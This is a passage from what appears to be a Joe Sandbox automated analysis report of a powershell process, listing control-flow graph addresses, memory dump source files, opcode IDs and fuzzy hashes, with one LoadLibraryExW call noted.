7ff848f347aa-7ff848f347c5 406->407 408 7ff848f347c7-7ff848f347d3 406->408 407->408 408->365 410 7ff848f347d9-7ff848f347e6 408->410 411 7ff848f347e8-7ff848f34803 410->411 412 7ff848f34805-7ff848f34835 410->412 411->412 419 7ff848f3483b-7ff848f3488d 412->419 420 7ff848f348e1-7ff848f34901 412->420 432 7ff848f348fe-7ff848f34902 419->432 433 7ff848f3488f-7ff848f34892 419->433 426 7ff848f34906-7ff848f34909 420->426 427 7ff848f3490b 426->427 428 7ff848f3491f-7ff848f34926 426->428 430 7ff848f34911-7ff848f3491c 427->430 431 7ff848f34927-7ff848f349dc 428->431 430->428 431->365 458 7ff848f349e2-7ff848f34a3f 431->458 432->426 434 7ff848f3490e-7ff848f34910 433->434 435 7ff848f34894 433->435 434->430 436 7ff848f348db-7ff848f348de 435->436 437 7ff848f34896-7ff848f348a0 435->437 436->420 437->430 440 7ff848f348a2-7ff848f348a6 437->440 440->431 443 7ff848f348a8-7ff848f348be 440->443 449 7ff848f348c0-7ff848f348d2 443->449 450 7ff848f348d5-7ff848f348da 443->450 449->450 450->420 461 7ff848f34a41-7ff848f34a7c 458->461 462 7ff848f34a84-7ff848f34abe 458->462 461->462 462->365 470 7ff848f34ac4-7ff848f34ad1 462->470 471 7ff848f34ad3-7ff848f34aee 470->471 472 7ff848f34af0-7ff848f34b03 470->472 471->472 474 7ff848f34b22-7ff848f34b75 472->474 475 7ff848f34b05-7ff848f34b20 472->475 474->365 484 7ff848f34b7b-7ff848f34b88 474->484 475->474 485 7ff848f34b8a-7ff848f34ba5 484->485 486 7ff848f34ba7-7ff848f34c0e 484->486 485->486 486->365 494 7ff848f34c14-7ff848f34c21 486->494 495 7ff848f34c23-7ff848f34c3e 494->495 496 7ff848f34c40-7ff848f34c4c 494->496 495->496 496->365 497 7ff848f34c52-7ff848f34c5f 496->497 499 7ff848f34c7e-7ff848f34c8a 497->499 500 7ff848f34c61-7ff848f34c7c 497->500 499->365 502 7ff848f34c90-7ff848f34c9d 499->502 500->499 504 7ff848f34c9f-7ff848f34cba 502->504 505 7ff848f34cbc-7ff848f34db8 502->505 504->505 505->365 526 7ff848f34dbe-7ff848f34dfb 505->526
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3969519363.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9e293629b2203f6a6ca879fd969a1a5db25f293e5319ea2a173c84bf1759bd14
                                                                                  • Instruction ID: a9cd600ddd152dafe2c5d40295941d6f2b1f7e9364f6eb4604bf4a26df498321
                                                                                  • Opcode Fuzzy Hash: 9e293629b2203f6a6ca879fd969a1a5db25f293e5319ea2a173c84bf1759bd14
                                                                                  • Instruction Fuzzy Hash: DFD2FF31E1DA8A8FE799EB289851678B7E1FF65780F5841FAD00DC72C3DE28AC458705

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 870 7ff848f3418f-7ff848f3419d 871 7ff848f341ae-7ff848f342ad 870->871 872 7ff848f3419f-7ff848f341a8 870->872 889 7ff848f342b3-7ff848f342bd 871->889 890 7ff848f33ca1-7ff848f340d6 871->890 872->871 891 7ff848f342bf-7ff848f342da 889->891 892 7ff848f342dc-7ff848f34343 889->892 910 7ff848f340dc-7ff848f340e9 890->910 891->892 892->890 906 7ff848f34349-7ff848f34353 892->906 908 7ff848f34372-7ff848f34385 906->908 909 7ff848f34355-7ff848f34370 906->909 911 7ff848f34387-7ff848f343a2 908->911 912 7ff848f343a4-7ff848f34434 908->912 909->908 914 7ff848f340eb-7ff848f340fe 910->914 915 7ff848f34105-7ff848f34123 910->915 911->912 912->890 937 7ff848f3443a-7ff848f3446a 912->937 914->915 915->890 920 7ff848f34129-7ff848f34133 915->920 923 7ff848f3415d-7ff848f34169 920->923 924 7ff848f34135-7ff848f34141 920->924 923->890 927 7ff848f3416f-7ff848f34179 923->927 924->923 928 7ff848f3417f-7ff848f3418e 927->928 929 7ff848f33cb2-7ff848f33cc0 927->929 929->871 939 7ff848f34474-7ff848f34512 call 7ff848f34e78 937->939 953 7ff848f34527-7ff848f34553 call 7ff848f35b6d 939->953 956 7ff848f34598-7ff848f345a4 953->956 957 7ff848f34555-7ff848f34590 953->957 958 7ff848f345aa-7ff848f345b7 956->958 959 7ff848f34522 956->959 957->956 962 7ff848f345b9-7ff848f345d4 958->962 963 7ff848f345d6-7ff848f345e6 958->963 959->953 962->963 963->959 965 7ff848f345ec-7ff848f345f9 963->965 967 7ff848f345fb-7ff848f34616 965->967 968 7ff848f34618-7ff848f34624 965->968 967->968 968->959 969 7ff848f3462a-7ff848f34637 968->969 972 7ff848f34639-7ff848f34654 969->972 973 7ff848f34656-7ff848f346de 969->973 972->973 973->959 986 7ff848f346e4-7ff848f346f1 973->986 987 7ff848f346f3-7ff848f3470e 986->987 988 7ff848f34710-7ff848f34723 986->988 987->988 990 7ff848f34742-7ff848f34795 988->990 991 7ff848f34725-7ff848f34740 988->991 990->959 1000 7ff848f3479b-7ff848f347a8 990->1000 991->990 1001 7ff848f347aa-7ff848f347c5 1000->1001 1002 7ff848f347c7-7ff848f347d3 1000->1002 1001->1002 1002->959 1004 7ff848f347d9-7ff848f347e6 1002->1004 1005 7ff848f347e8-7ff848f34803 1004->1005 1006 7ff848f34805-7ff848f34835 1004->1006 1005->1006 1013 7ff848f3483b-7ff848f3488d 1006->1013 1014 7ff848f348e1-7ff848f34901 1006->1014 1026 7ff848f348fe-7ff848f34902 1013->1026 1027 7ff848f3488f-7ff848f34892 1013->1027 1020 7ff848f34906-7ff848f34909 1014->1020 1021 7ff848f3490b 1020->1021 1022 7ff848f3491f-7ff848f34926 1020->1022 1024 7ff848f34911-7ff848f3491c 1021->1024 1025 7ff848f34927-7ff848f349dc 1022->1025 1024->1022 1025->959 1052 7ff848f349e2-7ff848f34a3f 1025->1052 1026->1020 1028 7ff848f3490e-7ff848f34910 1027->1028 1029 7ff848f34894 1027->1029 1028->1024 1030 7ff848f348db-7ff848f348de 1029->1030 1031 7ff848f34896-7ff848f348a0 1029->1031 1030->1014 1031->1024 1034 7ff848f348a2-7ff848f348a6 1031->1034 1034->1025 1037 7ff848f348a8-7ff848f348be 1034->1037 1043 7ff848f348c0-7ff848f348d2 1037->1043 1044 7ff848f348d5-7ff848f348da 1037->1044 1043->1044 1044->1014 1055 7ff848f34a41-7ff848f34a7c 1052->1055 1056 7ff848f34a84-7ff848f34abe 1052->1056 1055->1056 1056->959 1064 7ff848f34ac4-7ff848f34ad1 1056->1064 1065 7ff848f34ad3-7ff848f34aee 1064->1065 1066 7ff848f34af0-7ff848f34b03 1064->1066 1065->1066 1068 7ff848f34b22-7ff848f34b75 1066->1068 1069 7ff848f34b05-7ff848f34b20 1066->1069 1068->959 1078 7ff848f34b7b-7ff848f34b88 1068->1078 1069->1068 1079 7ff848f34b8a-7ff848f34ba5 1078->1079 1080 7ff848f34ba7-7ff848f34c0e 1078->1080 1079->1080 1080->959 1088 7ff848f34c14-7ff848f34c21 1080->1088 1089 7ff848f34c23-7ff848f34c3e 1088->1089 1090 7ff848f34c40-7ff848f34c4c 1088->1090 1089->1090 1090->959 1091 7ff848f34c52-7ff848f34c5f 1090->1091 1093 7ff848f34c7e-7ff848f34c8a 1091->1093 1094 7ff848f34c61-7ff848f34c7c 1091->1094 1093->959 1096 7ff848f34c90-7ff848f34c9d 1093->1096 1094->1093 1098 7ff848f34c9f-7ff848f34cba 1096->1098 1099 7ff848f34cbc-7ff848f34db8 1096->1099 1098->1099 1099->959 1120 7ff848f34dbe-7ff848f34dfb 1099->1120
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3969519363.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f01592cb0fee11d25f49e38f2d338d21d026293b8980dc2317a22cdd84c7f87
                                                                                  • Instruction ID: 36ee47fe65c49f76b7d8f70bc882850a8c7148c4c79de4e4c1de159cef75bdde
                                                                                  • Opcode Fuzzy Hash: 6f01592cb0fee11d25f49e38f2d338d21d026293b8980dc2317a22cdd84c7f87
                                                                                  • Instruction Fuzzy Hash: 6A92EF31E1DA8A8FE799EB688851678B7E1FF65740F5800FAD00DD72C3DE28AC458719

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 529 7ff848e6d324-7ff848e6d32b 530 7ff848e6d32d-7ff848e6d335 529->530 531 7ff848e6d336-7ff848e6d39f 529->531 530->531 534 7ff848e6d3a9-7ff848e6d3db LoadLibraryExW 531->534 535 7ff848e6d3a1-7ff848e6d3a6 531->535 536 7ff848e6d3dd 534->536 537 7ff848e6d3e3-7ff848e6d40a 534->537 535->534 536->537
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3968700572.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7ff848e60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 6a7b27e20b6a6e1e0eb4967004cb7f4baab25712d0308fb321a8bfec22d02da7
                                                                                  • Instruction ID: 2af9273c77cfea50ed86269d24c011a9061a10b8104bda1446e0101c3f441985
                                                                                  • Opcode Fuzzy Hash: 6a7b27e20b6a6e1e0eb4967004cb7f4baab25712d0308fb321a8bfec22d02da7
                                                                                  • Instruction Fuzzy Hash: 9D31F53190CA4D8FDB59DF988849BE9BBE0FF65321F04422BD009D3251DB75A805CB91